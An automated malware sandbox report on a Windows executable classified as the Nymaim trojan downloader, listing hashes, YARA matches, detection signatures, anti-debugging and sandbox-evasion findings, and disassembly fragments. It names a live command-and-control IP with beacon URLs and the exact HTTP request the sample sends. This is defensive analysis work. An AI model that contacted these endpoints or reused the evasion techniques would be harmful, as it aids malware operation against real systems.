
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565650
MD5: bd23f2ee2aea0a9c0464bc44292485fc
SHA1: 35b9012235c5a7c3094fc87f5a54fc542e8b78ab
SHA256: 28c26c34bdb7a826385868133025f41dcb9f5313bb26d1a2ef365d3a9f913bd3
Tags: exe, user-Bitsight

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BD23F2EE2AEA0A9C0464BC44292485FC)
  • cleanup
Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Blogpost URLs: (none in the report)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Yara matches on memory dumps (Source | Rule | Description | Author | Strings):

  • 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
  • 00000000.00000003.2080963099.0000000004A20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
  • 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
  • 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
  • 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security

Yara matches on unpacked PE files (Source | Rule | Description | Author | Strings):

  • 0.3.file.exe.4a20000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
  • 0.2.file.exe.400000.0.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
  • 0.2.file.exe.4930e67.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
  • 0.2.file.exe.400000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security

No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub4 | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubes | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2 | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubgs2 | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubB | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub) | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1003 | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl | Avira URL Cloud: Label: malware
Source: 0.3.file.exe.4a20000.0.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: file.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04933837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417727 FindFirstFileExW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494798E FindFirstFileExW

Networking

Source: Malware configuration extractor | IPs: 185.156.72.65 (listed four times in the extracted configuration)
Source: Joe Sandbox View | IP Address: 185.156.72.65
Source: Joe Sandbox View | ASN Name: ITDELUXE-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.72.65 (50 identical entries recorded)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance
Source: global traffic | HTTP traffic detected (13 identical requests recorded):
  GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 1
  Host: 185.156.72.65
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub4
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1003
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubB
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubes
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubgs2
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl
Source: file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubr

E-Banking Fraud

Source: Yara match | File source: 0.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2080963099.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

System Summary

Source: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0493AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0040A7A0 appears 35 times
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9947045846602972
Source: file.exe | Static PE information: Section: xdrminwo ZLIB complexity 0.9920369017936886
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04788464 CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance
Source: C:\Users\user\Desktop\file.exe | Command line argument: nosub | 0_2_004087E0
Source: C:\Users\user\Desktop\file.exe | Command line argument: mixtwo | 0_2_004087E0
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 31%
Source: file.exe | String found in binary or memory: /add?substr=
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1991168 > 1048576
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: Raw size of xdrminwo is bigger than: 0x100000 < 0x1a3e00

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdrminwo:EW;fjbklart:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x1f0aaa should be: 0x1e6944
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: xdrminwo
                Source: file.exe | Static PE information: section name: fjbklart
                Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A237 push ecx; ret | 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00421B7D push esi; ret | 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BF05B push 7C0787D3h; mov dword ptr [esp], esi | 0_2_004BF112
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BF05B push 0289C9A1h; mov dword ptr [esp], ebp | 0_2_004BF136
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BF05B push 6CFE57E3h; mov dword ptr [esp], eax | 0_2_004BF1F3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push edx; mov dword ptr [esp], eax | 0_2_005DB8AB
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push ecx; mov dword ptr [esp], 77EBC99Ah | 0_2_005DB8BE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push eax; mov dword ptr [esp], edx | 0_2_005DB93F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push ebx; mov dword ptr [esp], edx | 0_2_005DB94E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push edx; mov dword ptr [esp], eax | 0_2_005DB9D3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push edx; mov dword ptr [esp], 7F7F53D1h | 0_2_005DB9D7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push eax; mov dword ptr [esp], 701E3BBEh | 0_2_005DBA87
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push ecx; mov dword ptr [esp], 7C9EB8C5h | 0_2_005DBB05
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push edx; mov dword ptr [esp], edi | 0_2_005DBB2F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 11BE6005h; mov dword ptr [esp], esi | 0_2_005DBB9F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push edi; mov dword ptr [esp], edx | 0_2_005DBBAC
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 7D98D11Eh; mov dword ptr [esp], ebp | 0_2_005DBC5F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 53D61649h; mov dword ptr [esp], esi | 0_2_005DBCD4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push ebp; mov dword ptr [esp], edi | 0_2_005DBD2B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push ebx; mov dword ptr [esp], ecx | 0_2_005DBD42
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 0AD1477Ah; mov dword ptr [esp], ebp | 0_2_005DBE90
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 0C227A61h; mov dword ptr [esp], esi | 0_2_005DBEAE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 5F6FC6DDh; mov dword ptr [esp], ebp | 0_2_005DBEFE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 2CA85D44h; mov dword ptr [esp], ecx | 0_2_005DBF10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 145F30C7h; mov dword ptr [esp], ebx | 0_2_005DBF6D
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 336DDACCh; mov dword ptr [esp], eax | 0_2_005DBF7F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB875 push 6B1A07ABh; mov dword ptr [esp], edx | 0_2_005DBFEE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D90DF push edi; mov dword ptr [esp], ecx | 0_2_005D90E4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D90DF push ecx; mov dword ptr [esp], 0C721A36h | 0_2_005D90E8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D90DF push eax; mov dword ptr [esp], edx | 0_2_005D9132
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D90DF push 1DF1395Ah; mov dword ptr [esp], edx | 0_2_005D917D
                Source: file.exe | Static PE information: section name: entropy: 7.939522646317655
                Source: file.exe | Static PE information: section name: xdrminwo entropy: 7.9497278462939756

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 47451E second address: 474531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F7E2CC83C98h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EA6C9 second address: 5EA6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7E2CD3B836h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E9CAE second address: 5E9CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E9E23 second address: 5E9E3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B843h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EBDDC second address: 5EBE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 xor dword ptr [esp], 45F2E1BEh 0x0000000c movsx ecx, si 0x0000000f lea ebx, dword ptr [ebp+1244B96Dh] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7E2CC83C98h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dx, bx 0x00000032 push eax 0x00000033 js 00007F7E2CC83CA4h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EBE1D second address: 5EBE21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60BC55 second address: 60BC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7E2CC83CA7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C495 second address: 60C49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C49B second address: 60C4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C4A0 second address: 60C4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CD3B847h 0x00000008 jbe 00007F7E2CD3B836h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C4C2 second address: 60C4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C4C8 second address: 60C4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C632 second address: 60C642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Ah 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C972 second address: 60C976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C976 second address: 60C988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F7E2CC83C96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C988 second address: 60C9C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E2CD3B836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7E2CD3B842h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7E2CD3B841h 0x0000001a jmp 00007F7E2CD3B83Eh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60C9C9 second address: 60C9D3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E2CC83C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 600423 second address: 600437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7E2CD3B83Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 600437 second address: 600441 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 600441 second address: 600459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CD3B83Dh 0x00000008 jg 00007F7E2CD3B836h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 600459 second address: 600472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F7E2CC83C96h 0x0000000c jmp 00007F7E2CC83C9Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E10F4 second address: 5E1100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CD3B836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E1100 second address: 5E1137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7E2CC83CA1h 0x0000000b jnc 00007F7E2CC83C96h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F7E2CC83CA4h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60D1A2 second address: 60D1B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7E2CD3B842h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
